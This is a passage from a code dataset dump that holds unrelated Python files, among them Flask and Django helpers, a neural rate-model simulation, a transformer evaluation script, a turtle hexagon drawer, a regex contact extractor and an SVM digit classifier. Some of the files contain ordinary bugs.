'.join(day['people'])))\n","sub_path":"css.py","file_name":"css.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"105661727","text":"from http import HTTPStatus\n\nfrom flask import request, jsonify, abort, make_response\n\n\ndef get_json():\n    json_req = request.get_json()\n    if not json_req:\n        # abort() accepts a status code or a Response object; wrap the JSON\n        # body in a response with an explicit 400 status.\n        abort(\n            make_response(\n                jsonify(\n                    {\n                        'error': True,\n                        'status': 'failed',\n                        'description': 'Not JSON request.',\n                    }\n                ),\n                HTTPStatus.BAD_REQUEST,\n            )\n        )\n    return json_req\n","sub_path":"server/views/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"118118481","text":"# import the necessary packages\nfrom picamera.array import PiRGBArray\nfrom picamera import PiCamera\nimport time\nimport cv2\nimport numpy as np\nimport funktiot\nfrom threading import Thread\n# load the Haar cascades\nface_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')\neye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')\n\n\n\n# initialize the camera and grab a reference to the raw camera capture\ncamera = PiCamera()\ncamera.resolution = (500, 300)\ncamera.framerate = 60\nrawCapture = PiRGBArray(camera, size=(500, 300))\n \n# allow the camera to warmup\ntime.sleep(0.1)\n# frame counter and current estimate for the FPS display\nlaskuri = 0\nfps = '0'\n# capture frames from the camera\nfor frame in camera.capture_continuous(rawCapture, format=\"bgr\", use_video_port=True):\n\n\t# grab the raw NumPy array representing the image, then initialize the timestamp\n\t# and occupied/unoccupied text\n\timage = frame.array\n\tgray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n\n\t\n\tfaces = face_cascade.detectMultiScale(gray, 1.3, 5)\n\tfor (x,y,w,h) in faces:\n\t\t# the filter placement and drawing helpers live in the funktiot module\n\t\tpoints_hattu, points_parta = funktiot.suodattimen_paikka(x,y,w,h)\n\t\tfunktiot.piirra_suodatin(points_hattu, points_parta)\n\n\tif laskuri == 0:\n\t\talku_aika = time.time()\n\tlaskuri += 1\n\tif laskuri == 15:\n\t\tfps = str(round(float((15/(time.time()-alku_aika)))))\n\t\tlaskuri = 0\n\t\tprint(fps)\n\t\t\n\t\n\tcv2.putText(image, fps, (10, 50), cv2.FONT_HERSHEY_DUPLEX, 2, (0,255,0))\n\tcv2.imshow(\"Frame\", image)\n\t# clear the stream in preparation for the next frame\n\trawCapture.truncate(0)\n\t\n\tkey = cv2.waitKey(1) & 0xFF\n\t# if the `q` key was pressed, break from the loop\n\tif key == ord(\"q\"):\n\t\tbreak\n","sub_path":"python/filter_version_3/filter.py","file_name":"filter.py","file_ext":"py","file_size_in_byte":1584,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} {"seq_id":"317908733","text":"import os\nimport numpy as np\nimport scipy as sc\nimport 
scipy.stats\nimport matplotlib.pyplot\nimport multiprocessing\nimport time\nimport ShareYourSystem as SYS\n\nclass RateModelClass():\n\n\tdef __init__(self,_UnitsInt):\n\n\t\t#Params Definition (and Declaration)\n\t\tself.UnitsInt=_UnitsInt\n\t\tself.ConstantTimeFloat=20.\n\t\tself.RestRateFloat=0.\n\t\tself.StartRateFloat=10.\n\t\tself.RunTimeFloat=10.\n\t\tself.StepTime=0.1\n\t\tself.ConnectivityFloat=0.2\n\t\tself.WeightFloat=1.\n\n\t\t#Variables Declaration\n\t\tself.RateFloatsArray=np.zeros((self.UnitsInt,(int)(self.RunTimeFloat/self.StepTime)),dtype=float)\n\t\tself.RateFloatsArray[:,0]=self.StartRateFloat*sc.stats.uniform.rvs(size=self.UnitsInt)\n\t\tself.WeigthsArray=1.*sc.stats.bernoulli.rvs(self.ConnectivityFloat,size=(self.UnitsInt,self.UnitsInt))\n\t\tself.AnalysisDict={}\n\n\n\t#Methods Definition\n\n\tdef initSimulation(self):\n\n\t\t#Init the RateFloatsArray\n\t\tself.RateFloatsArray=np.zeros((self.UnitsInt,(int)(self.RunTimeFloat/self.StepTime)),dtype=float)\n\t\tself.RateFloatsArray[:,0]=self.StartRateFloat*sc.stats.uniform.rvs(size=self.UnitsInt)\n\n\t\t#Set the SynapticWeigthsArray\n\t\tself.WeigthsArray=self.WeightFloat*sc.stats.bernoulli.rvs(self.ConnectivityFloat,size=(self.UnitsInt,self.UnitsInt))\n\n\t\t#Init the AnalysisDict\n\t\tself.AnalysisDict={}\n\n\t\t#Return self\n\t\treturn self\n\n\tdef runSimulation(self):\n\n\t\t#Compute the first order differential equation\n\t\tfor TimeIndexInt in xrange(1,(int)(self.RunTimeFloat/self.StepTime)):\n\n\t\t\tself.RateFloatsArray[:,TimeIndexInt]= self.RateFloatsArray[:,TimeIndexInt-1] + (\n\t\t\t\t\t\t\t\t\t\t\t\t#Leak Term\n\t\t\t\t\t\t\t\t\t\t\t\t-self.RateFloatsArray[:,TimeIndexInt-1] + np.tanh(np.dot(\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t#Interaction Term\n\t\t\t\t\t\t\t\t\t\t\t\t\t\tself.WeigthsArray,self.RateFloatsArray[:,TimeIndexInt-1]))\n\t\t\t\t\t\t\t\t\t\t\t\t) * (self.StepTime/self.ConstantTimeFloat)\n\n\t\t#Return self\n\t\treturn self\n\n\tdef plotSimulation(self):\n\t\tFigure,Axe=matplotlib.pyplot.subplots()\n\t\tAxe.plot(self.StepTime*np.array(range((int)(self.RunTimeFloat/self.StepTime))),self.RateFloatsArray.T)\n\t\tAxe.set_xlabel(\"$t\\ (ms)$\")\n\t\tAxe.set_ylabel(\"$r_{i}(t)\\ ()$\")\n\t\tAxe.set_title(\"From Object protocol\")\n\t\t\n\t\t#Return self\n\t\treturn self\n\n\tdef recordSimulation(self):\n\n\t\tAnalysisDict={\n\t\t\t\t\t\t#Analysis Data\n\t\t\t\t\t\t\"MeanRateFloatsList\":np.mean(self.RateFloatsArray),\n\t\t\t\t\t\t\"STDRateFloatsList\":np.std(self.RateFloatsArray),\n\t\t\t\t\t\t#Corresponding Parameters\n\t\t\t\t\t\t\"UnitsInt\":self.UnitsInt,\n\t\t\t\t\t\t\"ConstantTimeFloat\":self.ConstantTimeFloat,\n\t\t\t\t\t\t\"RunTimeFloat\":self.RunTimeFloat,\n\t\t\t\t\t\t\"StepTime\":self.StepTime,\n\t\t\t\t\t\t\"ConnectivityFloat\":self.ConnectivityFloat\n\t\t}\n\t\t#Or quicker...\n\t\tAnalysisDict=dict({\n\t\t\t\t\t\t#Analysis Data\n\t\t\t\t\t\t\"MeanRateFloatsList\":np.mean(self.RateFloatsArray),\n\t\t\t\t\t\t\"STDRateFloatsList\":np.std(self.RateFloatsArray)\n\t\t\t\t\t},**self.__dict__)\n\t\t\t\t\t\t#\"UnitsInt\":self.UnitsInt,\n\t\t\t\t\t\t#\"ConstantTimeFloat\":self.ConstantTimeFloat,\n\t\t\t\t\t\t#\"RunTimeFloat\":self.RunTimeFloat,\n\t\t\t\t\t\t#\"StepTime\":self.StepTime,\n\t\t\t\t\t\t#\"ConnectivityFloat\":self.ConnectivityFloat\n\n\n\t\t\"\"\"\n\t\t#################################\n\t\t#ENCAPSULATION AVOIDS THE INFINITE HAND WRITING TASK FOR THE SERIALIZATION PROBLEM...\n\t\t\"\"\"\n\n\t\t#Return self\n\t\treturn self\n\n\tdef 
writeSimulation(self):\n\t\t#addData(open(\"Data.dat\"),self.AnalysisDict)\n\t\t\n\t\t#Return self\n\t\treturn self\n\n\"\"\"\n#################################\n# (C) PARALLELIZE PROCESSES... \n\"\"\"\n\nUnitIntsList=xrange(1,1000)\ndef doProtocolWithUnitsInt(_UnitsInt):\n\tRateModelClass(_UnitsInt).initSimulation().runSimulation().recordSimulation().writeSimulation()\nMyPool=multiprocessing.Pool(processes=min(100,len(UnitIntsList)))\n\n\"\"\"\n#Sequential\ntic=time.time()\nmap(lambda UnitsInt:doProtocolWithUnitsInt(UnitsInt),UnitIntsList)\nprint('Sequential Calcul : '+str(time.time()-tic))\n\"\"\"\n\n#Parallel\ntic=time.time()\nMyPool.map(doProtocolWithUnitsInt,UnitIntsList)\nprint('Paralell Calcul : '+str(time.time()-tic))\n\n#for UnitIntsList=xrange(1,1000) processes=min(99,len(UnitIntsList))\n#Sequential Calcul : 0.352154016495\n#Paralell Calcul : 0.107304811478\n\n#for UnitIntsList=xrange(1,1000) processes=min(99,len(UnitIntsList))\n#Sequential Calcul : 39.8414371014\n#Paralell Calcul : 22.0918791294\n\n#doProtocol(10)\n\n","sub_path":"Modules/Scripts/Script3.py","file_name":"Script3.py","file_ext":"py","file_size_in_byte":4110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"183967780","text":"# ============Imports===============\nfrom tqdm.auto import tqdm\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\nfrom transformers import DistilBertTokenizerFast, get_scheduler\nimport torch\nimport torch.nn as nn\nfrom torch.utils.data import DataLoader\nfrom transformers import DistilBertForSequenceClassification, ElectraForSequenceClassification, AdamW\nfrom sklearn.metrics import accuracy_score, precision_score, recall_score\nimport os\n\ndevice = torch.device('cuda') if torch.cuda.is_available() else torch.device('cpu')\n# =================Hyperparameters=================\nnum_epochs = 3\ncheckpoint1 = 'distilbert-base-uncased'\ncheckpoint2 = 'google/electra-small-discriminator'\nmax_len = 512\nmodel1 = 'distilbert'\nmodel2 = 'electra'\nmodel3 = 'ensemble'\nmodel_name = model2\n\n# ===========Load data and preprocess ==============\n\ntest_df = pd.read_csv('test.csv')\ntest_df.columns = ['label','text']\ntest_df['label'] = test_df['label'] - 1\ntest_texts = test_df['text'].values.tolist()\ntest_labels = test_df['label'].values.tolist()\n\n# =================Tokenizing and creating data loaders=====================\ntokenizer = DistilBertTokenizerFast.from_pretrained(checkpoint2)\ntest_encodings = tokenizer(test_texts, truncation=True, padding=True, max_length=max_len)\n\nclass YelpDataset(torch.utils.data.Dataset):\n def __init__(self, encodings, labels):\n self.encodings = encodings\n self.labels = labels\n\n def __getitem__(self, idx):\n item = {key: torch.tensor(val[idx]) for key, val in self.encodings.items()}\n item['labels'] = torch.tensor(self.labels[idx])\n return item\n\n def __len__(self):\n return len(self.labels)\n\ntest_dataset = YelpDataset(test_encodings, test_labels)\n\ntest_dataloader = DataLoader(test_dataset, shuffle=True, batch_size=8)\n\n# ==========================Models============================================\n\nclass Classifier(nn.Module):\n def __init__(self):\n super(Classifier, self).__init__()\n self.m1 = DistilBertForSequenceClassification.from_pretrained(checkpoint1)\n self.m2 = ElectraForSequenceClassification.from_pretrained(checkpoint2)\n self.dropout = nn.Dropout(0.3)\n self.out3 = nn.Linear(4,2)\n def forward(self, ids):\n output_1 = self.m1(ids, return_dict=False)\n 
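recordSimulation() above builds a plain dict, but writeSimulation() is left as a stub (its addData call is commented out). A minimal sketch of one way to persist it, assuming JSON-lines output and coercing NumPy values to builtins first; the file name is illustrative:

import json
import numpy as np

def write_analysis_dict(analysis_dict, path='Data.json'):
    # NumPy scalars and arrays are not JSON-serializable; coerce them first.
    def to_builtin(value):
        if isinstance(value, np.ndarray):
            return value.tolist()
        if isinstance(value, np.generic):
            return value.item()
        return value
    payload = {k: to_builtin(v) for k, v in analysis_dict.items()}
    with open(path, 'a') as f:
        f.write(json.dumps(payload, default=str) + '\n')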
output_2 = self.dropout(output_1[0])\n        output_3 = self.m2(ids, return_dict=False)\n        output_4 = self.dropout(output_3[0])\n        output_5 = torch.cat((output_2, output_4), dim=1)\n        output = self.out3(output_5)\n        return output\n\nif model_name == model1:\n    model = DistilBertForSequenceClassification.from_pretrained(checkpoint1)\nelif model_name == model2:\n    model = ElectraForSequenceClassification.from_pretrained(checkpoint2)\nelif model_name == model3:\n    model = Classifier()\n\nmodel.load_state_dict(torch.load('model_{}.pt'.format(model_name), map_location=device))\nmodel.to(device)\n\nPRED = []\nY = []\ndef update(pred,y):\n    x = pred.detach().cpu().numpy()\n    z = y.detach().cpu().numpy()\n    for i in range(len(x)):\n        PRED.append(x[i])\n        Y.append(z[i])\n\nnum_eval_steps = len(test_dataloader)\nprogress_bar = tqdm(range(num_eval_steps))\n\nmodel.eval()\nfor batch in test_dataloader:\n    input_ids = batch['input_ids'].to(device)\n    labels = batch['labels'].to(device)\n    with torch.no_grad():  # a bare torch.no_grad() call is a no-op; it must be used as a context manager\n        if model_name in (model1, model2):\n            outputs = model(input_ids, labels=labels)\n            logits = outputs.logits\n        else:\n            outputs = model(input_ids)\n            logits = outputs\n    predictions = torch.argmax(logits, dim=-1)\n    update(predictions,labels)\n    progress_bar.update(1)\n\n\nacc = accuracy_score(Y, PRED)\nprint(\"\\nValidation accuracy:\",acc)\n\npre = precision_score(Y, PRED)\nprint(\"\\nValidation precision:\",pre)\n\nrec = recall_score(Y, PRED)\nprint(\"\\nValidation recall:\",rec)","sub_path":"Nitin-Godi-Individual-Project/Code/my_script_transformers_test.py","file_name":"my_script_transformers_test.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"565354921","text":"from django import forms\nfrom django.contrib.auth.models import User\nfrom django.core.exceptions import ValidationError, ObjectDoesNotExist\nfrom django.forms import widgets\nfrom webapp.models import Issue, Status, Type, Project, Team\nfrom datetime import datetime\n\n\ndef get_all_project_of_user(user):\n    return Project.objects.filter(teams__participant_id=user)\n\n\nclass IssueForm(forms.ModelForm):\n    assigned_to = forms.ModelChoiceField(queryset=User.objects.all(), label='Исполнитель', empty_label='Укажите исполнителя')\n\n    class Meta:\n        model = Issue\n        exclude = ['created_at', 'created_by', 'project']\n\n\nclass ProjectForm(forms.ModelForm):\n    participants = forms.ModelMultipleChoiceField(queryset=User.objects.all(), label='Участники проекта', required=False)\n\n    class Meta:\n        model = Project\n        exclude = ['created_at', 'updated_at']\n\n    def save(self, commit=True):\n        project = super().save()\n        self.delete_participants(project)\n        self.add_participants(project)\n        return project\n\n    def delete_participants(self, project):\n        for team in Team.objects.filter(project=project):\n            if team.participant not in self.cleaned_data['participants']:\n                team.finished_at = datetime.now()\n                team.save()\n\n    def add_participants(self, project):\n        for participant in self.cleaned_data['participants']:\n            team, _ = Team.objects.get_or_create(project=project, participant=participant)\n            team.finished_at = None\n            team.save()\n\n\nclass ChangeTeamForm(forms.ModelForm):\n    participants = forms.ModelMultipleChoiceField(queryset=User.objects.all(), label='Выберите участников проекта', required=False)\n\n    class Meta:\n        model = Project\n        fields = ['participants']\n\n    def save(self, commit=True):\n        project = super().save()\n        self.delete_participants(project)\n
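        # note (added): drop de-selected members first, then re-activate or add the chosen ones below\n        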
self.add_participants(project)\n return project\n\n def delete_participants(self, project):\n for team in Team.objects.filter(project=project):\n if team.participant not in self.cleaned_data['participants']:\n team.finished_at=datetime.now()\n team.save()\n\n def add_participants(self, project):\n for participant in self.cleaned_data['participants']:\n team, _ = Team.objects.get_or_create(project=project, participant=participant)\n team.finished_at = None\n team.save()\n\n\nclass StatusForm(forms.ModelForm):\n class Meta:\n model = Status\n fields = ['name']\n\n\nclass TypeForm(forms.ModelForm):\n class Meta:\n model = Type\n fields = ['name']\n\n\nclass SimpleSearchForm(forms.Form):\n search = forms.CharField(max_length=100, required=False, label='Найти')","sub_path":"source/webapp/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":2865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"518073176","text":"#!/usr/bin/env python3\n#-*- coding: utf-8 -*-\n\nimport sys\nsys.path.append('../')\n\nfrom models.container import Container\n\nclass Unit(Container):\n\n def __init__(self, engineobj=None, *components):\n\n super().__init__(engineobj, *components)\n\n\nif __name__=='__main__':\n\n u = Unit()\n\n print(u.components)\n\n","sub_path":"resources/hexeng/models/unit.py","file_name":"unit.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"25115981","text":"#!/usr/bin/env python\n#\n# (c) 2012 Commonwealth of Australia\n# Australian Bureau of Meteorology, COSPPac COMP\n# All Rights Reserved\n#\n# Authors: Sheng Guo \n# Jason Smith \n\ndef nameformat(lat,lon):\n\n #if lat >= 0:\n # latst = '%s%s' % ('+',lat)\n #if lon >= 0:\n # lonst = '%s%s' % ('+',lon)\n\n latstr = '%+08.3f' % float(lat)\n lonstr = '%+08.3f' % float(lon)\n\n return latstr, lonstr\n\ndef NESWformat(lat,lon):\n lat = round(float(lat),2)\n lon = round(float(lon),2)\n latstr = str(lat)\n lonstr = str(lon)\n\n if lat >= 0:\n latstr = '%s %s' % (lat,'N')\n\n if lon >= 0:\n lonstr = '%s %s' % (lon,'E')\n\n if lat < 0:\n laty = abs(lat)\n latstr = '%s %s' % (laty,'S')\n\n if lon < 0:\n lony = abs(lon)\n lonstr = '%s %s' % (lony,'W')\n\n return latstr,lonstr\n","sub_path":"ocean/datasets/ww3/formatter.py","file_name":"formatter.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451791478","text":"import turtle\n\nt = turtle.Turtle()\nt.speed(10000)\nt.ht()\n\ndef hexagon(x, y):\n\n\tt.setposition(x, y)\n\tt.left(30)\n\tt.forward(a)\n\tt.left(120)\n\t\n\tfor _ in range(6):\n\t\tt.pendown()\n\t\tt.forward(a)\n\t\tt.left(60)\n\t\tt.penup()\n\t\t\n\tt.left(60)\n\tt.forward(a)\n\tt.left(150)\n\n\nn = int(input('Введите количество шестиугольников вдоль стороны большого шестиугольника: '))\na = int(input('Введите длинну сторны шестиугольника: '))\nh = a * (3 ** (1/2)) / 2\n\nt.penup()\n\nfor i in range(2 * n - 1):\n\tx = ((n - 1) - i) * (2 * h)\n\ty = 0\n\thexagon(x, y)\n\nfor i in range(n - 1):\n\tfor j in range((n - 1) * 2 - i):\n\t\tx = ((2 * (n - 1) - 1) - i) * h - (2 * h * j) \n\t\ty = (3 / 2) * a * (i + 1)\n\t\thexagon(x, y)\n\t\thexagon(x, -y)\n\nt.home()\ninput()","sub_path":"HW_#1_1.py","file_name":"HW_#1_1.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} 
+{"seq_id":"531254784","text":"from collections import deque\r\n\r\ndef bfs(n, m, x, y, infests, vaccinateds, visited):\r\n queue = deque()\r\n empty = m * n\r\n count = 0\r\n for vaccinated in vaccinateds:\r\n a, b = vaccinated\r\n visited[a - 1][b - 1] = True\r\n empty -= 1\r\n\r\n for infest in infests:\r\n a, b = infest\r\n visited[a - 1][b - 1] = True\r\n empty -= 1\r\n queue.append([a - 1, b - 1, 0])\r\n\r\n while queue and empty:\r\n print(x,y)\r\n x, y = queue.popleft()\r\n visited[x][y] = True\r\n DELTAS = ((0, 1), (0, -1), (1, 0), (-1, 0))\r\n for dx, dy in DELTAS:\r\n next_x, next_y = x + dx, y + dy\r\n if visitable(n, m, next_x, next_y, visited) and infest[next_x][next_y] == infest[x][y]:\r\n queue.append((next_x, next_y))\r\n visited[next_x][next_y] = True\r\n empty -= 1\r\n count += 1\r\n return count if empty >= 0 else -1\r\ndef visitable(n, m, x, y, visited):\r\n return 0 <= x < n and 0 <= y < m and not visited[x][y]\r\n\r\ndef solution(m, n, infests, vaccinateds):\r\n answer = 0\r\n visited = [[[False] for _ in range(n)] for _ in range(m)]\r\n\r\n\r\n for index1 in range(m):\r\n for index2 in range(n):\r\n answer = bfs(m, n, index1, index2, infests, vaccinateds, visited)\r\n\r\n return answer\r\n\r\n\r\nm = 2\r\nn = 4\r\ninfests = [[1,4],[2,2]]\r\nvaccinateds = [[1,2]]\r\nprint(solution(m,n,infests,vaccinateds))","sub_path":"전염병.py","file_name":"전염병.py","file_ext":"py","file_size_in_byte":1441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"546652635","text":"#! python3\n# Chapter7PhoneNumberAndEmailAddressExtractor\n\n# NOTE: This is taken directly from the book, and doesn't work\n# Not sure if this can be fixed, moving onto the next example.\n\nimport re\n\n# Docs for Pyperclip:\n# https://pyperclip.readthedocs.io/en/latest/introduction.html\n\n# Project Goals:\n\n# 1. Use the pyperclip module to copy and paste strings.\n\n# 2. Create two regexes, one for matching phone numbers and the other for matching email addresses.\n\n# 3. Find all matches, not just the first match, of both regexes.\n\n# 4. Neatly format the matched strings into a single string to paste.\n\n# 5. Display some kind of message if no matches were found in the text.\n\nphoneNumberRegex = re.compile(r'''(\n (\\d{3}|\\(\\d{3}\\))? # Area Code\n (\\s|-|\\.)? # Separator\n (\\d{3}) # First Three Digits\n (\\s|-|\\.) # Separator\n \\d{4} # Last Four Digits\n (\\s*(ext|x|ext.)\\s*\\d{2,5})? # Extension\n)''', re.VERBOSE)\n\nmo1 = phoneNumberRegex.search('My phone number is (555) 555-5555 ext 3. 
My second phone number is (777) 777-7777 ext 7').group()\n\nprint('mo1 = ' + str(mo1))\n\nemailRegex = re.compile(r'''(\n    [a-zA-Z0-9._%+-]+      # username\n    @                      # @ symbol\n    [a-zA-Z0-9.-]+         # domain name\n    (\\.[a-zA-Z]{2,4})      # dot-something\n    )''', re.VERBOSE)\n\nmo2 = emailRegex.findall('My e-mail address is example@example.com')\n\nprint('mo2 = ' + str(mo2))\n\ntext = str(input('Please copy and paste the text into here, and hit enter to extract any email addresses:'))\n\nmatches = []\n\nfor groups in phoneNumberRegex.findall(text):\n    phoneNum = '-'.join([groups[1], groups[3], groups[5]])\n    if groups[8] != '':\n        phoneNum += ' x' + groups[8]\n    matches.append(phoneNum)\n\nfor groups in emailRegex.findall(text):\n    matches.append(groups[0])\n\nif len(matches) > 0:\n    print('\\n'.join(matches))\n\nelse:\n    print('No phone numbers or email addresses found.')\n","sub_path":"python/03AutomateTheBoringStuffWithPython/07PatternMatchingWithRegularExpressions/Chapter7PhoneNumberAndEmailAddressExtractor.py","file_name":"Chapter7PhoneNumberAndEmailAddressExtractor.py","file_ext":"py","file_size_in_byte":1957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"109183757","text":"'''\n\nRun extra electron ID algorithms.\n\nOriginal author: M. Bachtis\n\n'''\n\nimport FWCore.ParameterSet.Config as cms\n\nfrom EGamma.EGammaAnalysisTools.electronIdMVAProducer_cfi import \\\n    mvaTrigV0, mvaNonTrigV0\n\nrecoElectronID = cms.Sequence(\n    mvaTrigV0 + mvaNonTrigV0\n)\n\n# For PAT\nelectronIDSources = cms.PSet(\n    cicLoose = cms.InputTag(\"eidLoose\"),\n    cicTight = cms.InputTag(\"eidTight\"),\n    mvaTrigV0 = cms.InputTag(\"mvaTrigV0\"),\n    mvaNonTrigV0 = cms.InputTag(\"mvaNonTrigV0\"),\n)\n","sub_path":"PatTools/python/electrons/electronID_cff.py","file_name":"electronID_cff.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"442350340","text":"from ..models import Buy, BuyItem\nfrom itertools import groupby\nfrom datetime import datetime\n\n# Create purchase orders, grouped by pharmaceutical company (account)\ndef create_buy(date=None):\n\t# a datetime.now() default argument would be evaluated once at import time and go stale\n\tif date is None:\n\t\tdate = datetime.now()\n\tincart = BuyItem.objects.filter(buy__isnull=True).order_by('drug__account')\n\tfor g, items in groupby(incart, lambda x:x.drug.account):\n\t\tbuy = Buy.objects.create(date=date)\n\t\tfor item in items:\n\t\t\tbuy.buyitem_set.add(item)\n\treturn buy\n","sub_path":"buy/modules/dbwork.py","file_name":"dbwork.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"520322954","text":"from flask import render_template, flash, redirect\nfrom app import app\nfrom .forms import InformationForm\nimport os\nfrom .getProfessionalInfoPTBR import Get_Professinal_PTBR\nfrom .getGenderInfoPTBR import GetGender_PTBR\nfrom .getAgeInfoPTBR import GetAge_PTBR\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n    user = {'nickname': 'Miguel'}\n    posts = [\n        {\n            'author': {'nickname': 'John'},\n            'body': 'Beautiful day in Portland!'\n        },\n        {\n            'author': {'nickname': 'Susan'},\n            'body': 'The Avengers movie was so cool!'\n        }\n    ]\n    return render_template('index.html',\n                           title='Home',\n                           user=user,\n                           posts=posts)\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n    form = InformationForm()\n    if form.validate_on_submit():\n        flash('Login requested for name=\"%s\", textComment=%s' %\n              (form.name.data, form.textComment.data))\n\n        frase = form.textComment.data\n        name = form.name.data\n\n
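        # note (added): run the three PT-BR information extractors over the submitted sentence\n        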
test_prof = Get_Professinal_PTBR()\n        test_age = GetAge_PTBR()\n        test_gender = GetGender_PTBR()\n\n        result = test_prof.get_profession(frase)\n        # print(result)\n\n        result = test_age.get_age(frase)\n        # print(result)\n\n        result = test_gender.get_gender(frase)\n\n        profissao = test_prof.get_profession(frase)\n\n        return str('o nome é ' + test_gender.get_gender_name(name) + '. ' + 'A profissao é ' + str(profissao))\n\n        # if this doesn't work, uncomment the line below\n#        return redirect('/index')\n\n\n    return render_template('login.html',\n                           title='Teste de Engenharia Linguística',\n                           form=form,\n                           providers=app.config['OPENID_PROVIDERS'])\n","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"248772473","text":"import pytest\nfrom immudb.client import ImmudbClient\nfrom random import randint\nimport grpc._channel\nimport google.protobuf.empty_pb2\n\n\nclass TestDatabase:\n\n    def test_list_use(self, client):\n        resp = client.databaseList()\n        assert \"defaultdb\" in resp\n        resp = client.databaseUse(b\"defaultdb\")\n        assert type(resp.reply.token) == str\n\n        # create a new DB with a random name (must be lowercase)\n        # randint is inclusive at both ends, so 65535 keeps the name to 4 hex digits\n        newdb = \"testdb{:04x}\".format(randint(0, 65535)).encode('utf8')\n        resp = client.databaseCreate(newdb)\n        assert type(resp.reply) == google.protobuf.empty_pb2.Empty\n        # try and use the new DB\n        resp = client.databaseUse(newdb)\n        assert type(resp.reply.token) == str\n\n        key = \"test_key_{:04d}\".format(randint(0, 9999))\n        value = \"test_value_{:04d}\".format(randint(0, 9999))\n\n        resp = client.verifiedSet(key.encode('utf8'), value.encode('utf8'))\n        assert resp.verified == True\n        readback = client.verifiedGet(key.encode('utf8'))\n        assert readback.verified == True\n        assert value.encode('utf8') == readback.value\n","sub_path":"tests/immu/test_database.py","file_name":"test_database.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"2818031","text":"def fib_digit(n: int) -> int:\n    \"\"\"This function calculates the last digit of the n-th Fibonacci number.\n    Where n is an integer with 1 <= n <= 10^7\"\"\"\n    assert n > 0\n    a: int = 0\n    b: int = 1\n    for _ in range(2, n + 1):\n        a, b = b, (a + b) % 10\n    return b\n\n\ndef main() -> None:\n    n: int = int(input())\n    print(fib_digit(n))\n\n\nif __name__ == \"__main__\":\n    main()\n","sub_path":"fibonacci_numbers/fib_last_digit.py","file_name":"fib_last_digit.py","file_ext":"py","file_size_in_byte":388,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"448938637","text":"from flask import Flask, render_template, request, redirect, url_for\r\nfrom werkzeug.utils import secure_filename\r\nimport pandas as pd \r\nfrom sklearn.svm import SVC\r\nfrom sklearn.preprocessing import StandardScaler\r\nimport logging\r\nimport logging.handlers\r\nimport joblib \r\nfrom openpyxl import Workbook\r\n\r\napp = Flask(__name__)\r\n\r\ndef savepickle(data, filename):\r\n    \"\"\"Saves the data into pickle format\"\"\"\r\n    # save_documents = open(filename +'.pickle', 'wb')\r\n    joblib.dump(data, filename)\r\n    # save_documents.close()\r\n\r\ndef loadpickle(data_filepath):\r\n    #Loads up the pickled dataset for further parsing and preprocessing\r\n    # documents_f = open(data_filepath+'.pickle', 'rb')\r\n    data = joblib.load(data_filepath)\r\n    # documents_f.close()\r\n    \r\n    return data\r\n\r\ndef 
train():\r\n    \r\n    data_path = \"train.csv\"\r\n    df = pd.read_csv(data_path)\r\n\r\n    scaler = StandardScaler()\r\n    # pandas removed the old .ix indexer; use position-based .iloc instead\r\n    scaler.fit(df.iloc[1:30000, 1:785])\r\n\r\n    X_train = scaler.transform(df.iloc[1:30000, 1:785])\r\n    y_train = df.iloc[1:30000, 0]  # a 1-D Series, which SVC.fit expects\r\n\r\n    print('using support vector machines : ')\r\n    SVM = SVC().fit(X_train, y_train)\r\n    print('accuracy on training set : ', SVM.score(X_train, y_train))\r\n    savepickle(SVM, 'model.pkl')\r\n\r\n\r\ndef test(SVM):\r\n    data_path = \"test.csv\"\r\n    test = pd.read_csv(data_path)\r\n\r\n    scaler = StandardScaler()\r\n    scaler.fit(test.iloc[:, :])\r\n\r\n    ans = []\r\n    index = []\r\n    i = 0\r\n    while i < 280:\r\n        # .iloc slices exclude the end index, so i:i+1 selects a single row\r\n        X_test = scaler.transform(test.iloc[i:i+1, 0:784])\r\n        predicted_value = SVM.predict(X_test)\r\n        ans.append(predicted_value[0])\r\n        print('predicted value: ', predicted_value[0])\r\n        index.append(i+1)\r\n        i = i + 1\r\n    df = pd.DataFrame({'ImageId': index, 'Label': ans})\r\n    df.to_excel('submit.xlsx', sheet_name='sheet1', index=False)\r\n\r\n@app.route('/')\r\ndef 